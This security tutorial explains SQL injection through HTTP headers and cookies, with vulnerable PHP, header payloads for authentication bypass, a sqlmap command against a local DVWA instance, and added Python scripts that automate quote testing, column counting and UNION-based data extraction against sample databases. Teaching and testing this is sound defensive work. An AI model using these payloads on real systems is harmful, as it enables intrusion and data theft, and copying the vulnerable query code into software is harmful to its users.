
SQL injection through HTTP headers

During vulnerability assessment or penetration testing, identifying the input vectors of the target application is a primordial step. Sometimes, when dealing with web application testing, verification routines related to SQL injection flaw discovery are restricted to the GET and POST variables as the only input vectors.

What about other HTTP header parameters? Aren't they potential input vectors for SQL injection attacks? How can one test all these HTTP parameters, and which vulnerability scanners should be used in order to avoid leaving vulnerabilities undiscovered in parts of the application?

Input parameter coverage in security web application scanners

A comparison of 60 commercial and open-source black-box web application vulnerability scanners was released under the title « The Scanning Legion: Web Application Scanners Accuracy Assessment & Feature Comparison ». This benchmark, conducted by the security researcher Shay Chen in 2011, focused on testing commercial and open source tools that are able to discover (and not necessarily exploit) security vulnerabilities on a wide range of URLs.
We have extracted from it the chart below, which shows the input parameter coverage supported by the tested web application scanners. These inputs are basically:

  • HTTP Query String Parameters (GET): input parameters sent in the URL.
  • HTTP Body Parameters (POST): input parameters sent in the HTTP body.
  • HTTP Cookie Parameters: input parameters sent in the HTTP cookie.
  • HTTP Headers: HTTP request headers used by the application.

75% of web application scanners couldn't discover flaws related to HTTP header parameters. Furthermore, 70% of these scanners failed to inspect HTTP cookie vulnerabilities as well. These rates refer precisely to the ability of the scanners to scan the input vector, not merely to interpret it. Compared to the reasonable scores obtained for GET and POST, some automated testing tools may give unsatisfactory results when dealing with HTTP headers as an SQL injection input vector.

As a matter of fact, HTTP headers and cookies should not be underestimated; these two vectors should be taken into consideration in the testing plan. When the vulnerability scanners in use do not support these features, we should think about testing these parameters manually.

Potential HTTP headers for SQL injections

HTTP header fields

HTTP header fields are components of the message header of requests and responses in the Hypertext Transfer Protocol (HTTP). They define the operating parameters of an HTTP transaction.

Example: HTTP request
GET / HTTP/1.1
Connection: Keep-Alive
Keep-Alive: 300
Accept: */*
Host: host
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16 ( .NET CLR 3.5.30729; .NET4.0E)
Cookie: guest_id=v1%3A1328019064; pid=v1%3A1328839311134

We can consider HTTP cookies, when they are stored in databases for session identification, as the first potential HTTP variables which should be tested. We will see an example of cookie-based SQL injection later. There are also other HTTP headers related to the application.

X-Forwarded-For

X-Forwarded-For is an HTTP header field considered a de facto standard for identifying the originating IP address of a client connecting to a web server through an HTTP proxy or load balancer.

We will see an example of this flaw based on a form submission.
$req = mysql_query("SELECT user,password FROM admins WHERE user='".sanitize($_POST['user'])."' AND password='".md5($_POST['password'])."' AND ip_adr='".ip_adr()."'");

The user variable is correctly controlled thanks to the sanitize() function.
function sanitize($param) {
    if (is_numeric($param)) {
        return $param;
    } else {
        return mysql_real_escape_string($param);
    }
}

Let us inspect the ip variable. It is assigned the output of the ip_adr() function.
function ip_adr() {
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        $ip_adr = $_SERVER['HTTP_X_FORWARDED_FOR'];
    } else {
        $ip_adr = $_SERVER["REMOTE_ADDR"];
    }
    // Anchored at the start only, and the dots are unescaped: anything that
    // begins with four dotted numbers passes this check.
    if (preg_match("#^[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}#", $ip_adr)) {
        return $ip_adr;
    } else {
        return $_SERVER["REMOTE_ADDR"];
    }
}

Obviously, the IP address is retrieved from the HTTP header X-Forwarded-For (exposed to PHP as $_SERVER['HTTP_X_FORWARDED_FOR']). This value is only checked by the preg_match, which verifies that the parameter starts with something that looks like an IP address: the pattern is anchored at the beginning only, so anything may follow the four dotted numbers. As a matter of fact, HTTP_X_FORWARDED_FOR is not properly sanitized before its value is used in the SQL query. This allows running arbitrary SQL by injecting SQL code into this field.

A simple modification of this header field to something like:
GET /index.php HTTP/1.1
Host: [host]
X-Forwarded-For: 127.0.0.1' or 1=1#

will bypass the authentication control: the quote closes the ip_adr string, "or 1=1" makes the WHERE clause true for every row, and "#" comments out the rest of the query.
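The following is an added example, not code from the original article, that replays the X-Forwarded-For flaw above in Python. It assumes an in-memory SQLite table named admins standing in for the MySQL table the PHP queries, a hypothetical sanitize() that doubles quotes (SQLite's escaping rule, in place of mysql_real_escape_string), and a payload adapted for SQLite, which has no "#" comment syntax: a closing quote is supplied instead of the comment. The vulnerable login is placed beside a parameterised version to show that the same header value is then treated as plain data.

```python
import hashlib
import re
import sqlite3

# Constructed sample data: one admin row, shaped like the page's `admins` table.
# SQLite stands in for MySQL; the PHP on the page calls mysql_query().
ADMIN_USER = "admin"
ADMIN_PASS = "correct horse"
ADMIN_IP = "10.0.0.5"

# Same pattern as the page's preg_match: '^' only, unescaped dots, no '$'.
XFF_RE = re.compile(r"^[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}")

# Page payload adapted for SQLite: closing quote instead of the MySQL '#' comment.
PAYLOAD = "127.0.0.1' or '1'='1"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admins (user TEXT, password TEXT, ip_adr TEXT)")
    conn.execute(
        "INSERT INTO admins VALUES (?, ?, ?)",
        (ADMIN_USER, hashlib.md5(ADMIN_PASS.encode()).hexdigest(), ADMIN_IP),
    )
    return conn


def ip_adr(headers, remote_addr):
    """Port of the page's ip_adr(): X-Forwarded-For wins if it merely *starts*
    with four dotted numbers, otherwise the socket address is used."""
    candidate = headers.get("X-Forwarded-For", remote_addr)
    return candidate if XFF_RE.match(candidate) else remote_addr


def sanitize(value):
    """Hypothetical stand-in for mysql_real_escape_string(): SQLite escapes a
    single quote by doubling it."""
    return value.replace("'", "''")


def login_vulnerable(conn, user, password, headers, remote_addr):
    """Builds the query the way the page's PHP does: user escaped, password
    hashed, but the ip_adr() result concatenated into the SQL text unescaped."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    sql = (
        "SELECT user,password FROM admins WHERE user='" + sanitize(user)
        + "' AND password='" + pw_hash
        + "' AND ip_adr='" + ip_adr(headers, remote_addr) + "'"
    )
    return conn.execute(sql).fetchall()


def login_fixed(conn, user, password, headers, remote_addr):
    """Same logic with bound parameters; the header value can only be data."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    return conn.execute(
        "SELECT user,password FROM admins WHERE user=? AND password=? AND ip_adr=?",
        (user, pw_hash, ip_adr(headers, remote_addr)),
    ).fetchall()


if __name__ == "__main__":
    conn = make_db()
    hdrs = {"X-Forwarded-For": PAYLOAD}
    print("regex accepts payload:", XFF_RE.match(PAYLOAD) is not None)
    print("vulnerable, wrong password:", login_vulnerable(conn, "admin", "wrong", hdrs, "198.51.100.7"))
    print("fixed, wrong password:     ", login_fixed(conn, "admin", "wrong", hdrs, "198.51.100.7"))
```

With the payload in place the vulnerable query returns the admin row even though the password is wrong, because "or '1'='1'" short-circuits the whole WHERE clause; the parameterised version returns nothing, and only the real credentials from the real address (10.0.0.5 in the constructed data) log in.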

User-Agent

The User-Agent HTTP header field identifies the software used by the original client. This is for statistical purposes and the tracing of protocol violations. It should be included. The first white-space-delimited word must be the software product name, with an optional slash and version designator.

Not all applications are written to capture the User-Agent data, but sometimes applications are designed to store such information (e.g. shopping cart providers) to make use of it. In this case, it's worth investigating the User-Agent header for possible issues.

HTTP request example:
GET /index.php HTTP/1.1
Host: [host]
User-Agent: aaa' or 1/*

Referer

Referer is another HTTP header which can be vulnerable to SQL injection once the application stores it in a database without sanitizing it. It's an optional header field that allows the client to specify, for the server's benefit, the address (URI) of the document (or element within the document) from which the URI in the request was obtained. This allows a server to generate lists of back-links to documents, for interest, logging, etc. It also allows bad links to be traced for maintenance.

Example:
GET /index.php HTTP/1.1
Host: [host]
User-Agent: aaa' or 1/*
Referer: http://www.yaboukir.com

Attacker's perspective?

As we all know, injection flaws are ranked first in the OWASP Top 10 Web Application Security Risks. Attackers are increasingly seeking injection points to get full access to your databases. No matter the injection input vector's type, whether it's GET, POST, Cookie or another HTTP header, what matters to intruders is always to have at least one injection point which lets them start the exploitation phase.

Manually testing Cookie based SQL injections

In this section, we will introduce some methods of inspecting HTTP cookie variables.

Using a browser add-on

Cookies Manager+

Cookies Manager+ allows viewing, editing and creating new cookies. It also shows extra information about cookies and allows editing multiple cookies at once, as well as backing them up and restoring them.

After installing it, from the Tools menu, select Cookies Manager+. We select a cookie variable related to the target application.

We will edit the language_id variable. To find the SQL injection flaw, we will add a quote "'" to the content field of the variable language_id.

After refreshing the page, or clicking another internal link of the application, the application submits the request using the edited HTTP cookie. The result is a triggered SQL error:

This database error alerts us to a likely SQL injection flaw.

The advantage of using Cookies Manager+ is that it's simple to use, acts directly on the cookie and saves the previously edited value of the cookie.

We will try to determine the number of columns using another Firefox plug-in.

Tamper Data

Tamper Data is a powerful Firefox add-on to view and modify HTTP/HTTPS headers and POST parameters.

After installing it, from the Tools menu, select Tamper Data. Start tampering HTTP requests by clicking the Start Tamper button.

When launching any request from the target application, Tamper Data pops up a box and asks if we want to tamper with the HTTP request just sent.

After clicking on Tamper, we get the full Tamper popup:

We add "order by 4" to the HTTP cookie variable as shown in the previous screenshot. The application responds normally.

We increment the number and add "order by 5" this time. The response to this injection is as follows:

So we can conclude that the number of columns is 4.

Now, we will try to figure out which columns are reflected in the page in order to inject further SQL queries through them. So, we will add the following query to the language_id HTTP cookie variable:

-1+UNION+ALL+SELECT+1,2,3,4

The exploitation may sometimes require advanced SQL injection techniques.
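As an added example, not part of the original article, the steps above (quote to confirm the flaw, ORDER BY to count columns, UNION ALL SELECT to find the displayed columns) are run end-to-end against a constructed SQLite table behind a hypothetical page that splices the language_id cookie into its query. The probing functions are assumptions about how such a script would be written, and a final step goes one beyond the page by reading an expression back through a displayed column. The technique is the one the page walks through by hand with Cookies Manager+ and Tamper Data.

```python
import sqlite3

# Constructed sample: a four-column table behind a hypothetical page that
# builds its query from the language_id cookie (SQLite stands in for MySQL).
ROWS = [(1, "English", "en", 1), (2, "French", "fr", 1)]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE languages (id INTEGER, name TEXT, iso TEXT, active INTEGER)")
    conn.executemany("INSERT INTO languages VALUES (?,?,?,?)", ROWS)
    return conn


def vulnerable_page(conn, language_id_cookie):
    """Flawed server side: the cookie value is spliced into the SQL text."""
    sql = "SELECT id,name,iso,active FROM languages WHERE id=" + language_id_cookie
    return conn.execute(sql).fetchall()


def probe(conn, cookie_value):
    """One tampered request. Returns (rows, error); the error text is the
    database error the page observed after injecting a quote."""
    try:
        return vulnerable_page(conn, cookie_value), None
    except sqlite3.Error as exc:
        return None, str(exc)


def is_injectable(conn, base="1"):
    """Step 1: a lone quote breaks the query when the value is not escaped."""
    _, err = probe(conn, base + "'")
    return err is not None


def column_count(conn, base="1", max_cols=20):
    """Step 2: ORDER BY n succeeds while n <= column count and errors at n+1."""
    for n in range(1, max_cols + 1):
        _, err = probe(conn, f"{base} ORDER BY {n}")
        if err is not None:
            return n - 1
    return None


def union_marker_columns(conn, ncols):
    """Step 3: -1 UNION ALL SELECT 1,2,...; the markers that come back are the
    columns whose content reaches the response."""
    markers = ",".join(str(i) for i in range(1, ncols + 1))
    rows, err = probe(conn, f"-1 UNION ALL SELECT {markers}")
    return [] if err or not rows else [str(v) for v in rows[0]]


def extract(conn, ncols, column, expression):
    """Step 4 (beyond the page): put an expression into a displayed column to
    read data back, e.g. sqlite_version() here, version() on MySQL."""
    cells = [str(i) for i in range(1, ncols + 1)]
    cells[column - 1] = expression
    rows, err = probe(conn, "-1 UNION ALL SELECT " + ",".join(cells))
    return None if err or not rows else rows[0][column - 1]


if __name__ == "__main__":
    conn = make_db()
    print("injectable:", is_injectable(conn))
    n = column_count(conn)
    print("columns:", n)
    print("marker columns returned:", union_marker_columns(conn, n))
    print("db version via column 2:", extract(conn, n, 2, "sqlite_version()"))
```

The -1 in the UNION payload makes the original WHERE match no row, so the only row the page renders is the one the attacker supplied, which is what makes the marker numbers visible.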

Using automated penetration testing scanner

Sqlmap as an example

Sqlmap is a popular open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers.

Sqlmap supports HTTP cookies, so it can be useful in two ways:

  • Authentication based upon cookies when the web application requires that.
  • Detection and exploitation of SQL injection on such header values.

By default sqlmap tests all GET and POST parameters. When the value of --level is set to 2 or above it also tests HTTP Cookie header values. When this value is set to 3 or above, it also tests the HTTP User-Agent and HTTP Referer header values for SQL injection. It is however possible to manually specify a comma-separated list of parameter(s) that you want sqlmap to test; this bypasses the dependence on the value of --level as well.

Tested HTTP parameter    Level in sqlmap
GET                      1 (default)
POST                     1 (default)
HTTP Cookie              ≥ 2
HTTP User-Agent          ≥ 3
HTTP Referer             ≥ 3

For example, to test the GET parameter id and the HTTP User-Agent only, provide -p id,user-agent.

This is an example of how we can test a parameter of the HTTP cookie of DVWA (Damn Vulnerable Web Application), here PHPSESSID:
./sqlmap.py -u 'http://127.0.0.1/vulnerabilities/sqli/?id=1&Submit=Submit#' \
    --cookie='PHPSESSID=0e4jfbrgd8190ig3uba7rvsip1; security=low' \
    --string='First name' --dbs --level 3 -p PHPSESSID

The --string flag gives a string that appears in the page only when the injected condition is true, so sqlmap can tell true responses from false ones. The --dbs flag enumerates the databases available on the DBMS. Finally, -p forces the testing of the PHPSESSID variable.

Tools for testing SQL injection: choose by detection accuracy or by input vector coverage?

In order to answer this question, we have used the results of the benchmark provided by sectoolmarket.com. We have assumed that the detection accuracy of the candidate scanners has the same importance as input vector coverage and support. We have considered GET, POST, HTTP Cookie and HTTP Headers as the input vectors that should be supported. When all these parameters are supported, the scanner reaches 100% coverage (4/4).

We suggest the arithmetic mean of the two rates as a balanced score for vulnerability scanners.

After balancing the obtained coverage rates with the percentage of detection accuracy, we obtained the result below for the first 14 scanners:

Vulnerability Scanner   Vendor                          Detection Rate   Average Score
Arachni                 Tasos Laskos                    100.00%          100.00%
Sqlmap                  sqlmap developers               97.06%           98.53%
IBM AppScan             IBM Security Sys Division       93.38%           96.69%
Acunetix WVS            Acunetix                        89.71%           94.85%
NTOSpider               NT OBJECTives                   85.29%           92.64%
Nessus                  Tenable Network Security        82.35%           91.17%
WebInspect              HP Apps Security Center         75.74%           87.87%
Burp Suite Pro          PortSwigger                     72.06%           86.03%
Cenzic Pro              Cenzic                          63.24%           81.62%
SkipFish                Michal Zalewski – Google        50.74%           75.37%
Wapiti                  OWASP                           100.00%          75.00%
Netsparker              Mavituna Security               98.00%           74.00%
Paros Pro               MileSCAN Technologies           93.38%           71.69%
ZAP                     OWASP                           77.21%           63.60%

What's next?

For developers

Cookies and other stored HTTP headers should be treated by developers as another form of user input and be subjected to the same validation routines.

For testers

The manipulation of HTTP header information on page requests (especially the Referer and User-Agent fields) is important to identify whether the application is vulnerable to SQL injection vectors or even to other standard vulnerabilities (XSS). It's good practice to define and describe every way a user may manipulate data which is used by the application. This data may be stored, fetched and processed from cookies, HTTP headers (like HTTP_USER_AGENT), form variables (visible and hidden), and Ajax, jQuery and XML requests.

Sources

  • Penetration Testing with Improved Input Vector Identification, William G.J. Halfond, Shauvik Roy Choudhary, and Alessandro Orso, College of Computing, Georgia Institute of Technology
  • Security Tools Benchmarking – by Shay Chen
  • Wikipedia
  • Tech brunch SQL injection
  • W3 HTML headers
  • W3 Protocols Headers
  • Mozilla Cookies manager plus
  • Mozilla addon tamper data
  • Sourceforge
  • Msdn Microsoft


Source: https://resources.infosecinstitute.com/topic/sql-injection-http-headers/
